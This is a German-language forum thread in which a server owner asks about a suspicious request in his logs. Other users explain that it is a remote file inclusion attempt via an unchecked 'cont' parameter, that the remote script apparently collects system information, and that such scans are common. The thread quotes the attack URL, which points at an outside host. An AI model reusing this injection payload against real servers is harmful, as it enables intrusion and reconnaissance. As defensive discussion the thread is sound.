Jemand hat versucht auf meinen Server ein Script zu injecten oder sowas.
Es wurde sowas aufgerufen /index.php?cont=http://irc.harazuku.co.cc/2002/.sh/responz/id2.tx
t??
Was macht das Script http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt ?
Jemand hat versucht auf meinen Server ein Script zu injecten oder sowas.
Es wurde sowas aufgerufen /index.php?cont=http://irc.harazuku.co.cc/2002/.sh/responz/id2.tx
t??
Was macht das Script http://irc.harazuku.co.cc/2002/.sh/responz/id2.txt ?
Sieht so aus als wenn es lediglich Informationen über Festplattennutzung und php-version preis geben soll. Und weitere allgemeine Systeminformationen ....
Greeez Oli
Notebook: Lenovo Z570 CoreI7
Workstation: Core2Quad Q6700 - ASUS P5WDG2-WS Pro - 8800GT - 4GB-DDR2/800 - 4x500GB=RAID1 - 120GB SSD - Innovatek Wakü - 27Widescreen/AcerTFT
Server: IBM X345 + Netfinity 5000
http://zyrusthc-linux.no-ip.org
Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...
Das bedeutet, dass wenn du ein für Code-Injection verwundbares Script hast (Stichwort Werteüberprüfung etc.) ein Angreifer einfach ein Script auf einem entfernten Webserver von deinem Webserver ausführen lassen kann. Statt z.b. die Datei "content.txt" auszugeben würde dann dein Webserver halt "http://boeserhost.tld/fieses_script" laden und auf deinem Webserver mit dessen rechten ausführen.Was genau bedeutet das ?
Naja, nur weil man den Eintrag in den Logs findet, muss noch lange nix passiert sein - ich hab von sowas täglich welche in den logs. Das sind meist schlicht automatisierte Angriffe über eine ganze IP-Range.Ich hoffe, du hast dein PHP-Skript abgesichert, wenn es mit der Variablen $cont (bzw. $_GET['cont']) verwundbar für eine Code-Injection-Attacke war...
"Da steht sowas ähnliches wie" oder "das funzt net!!" ist keine Fehlermeldung!
Lesezeichen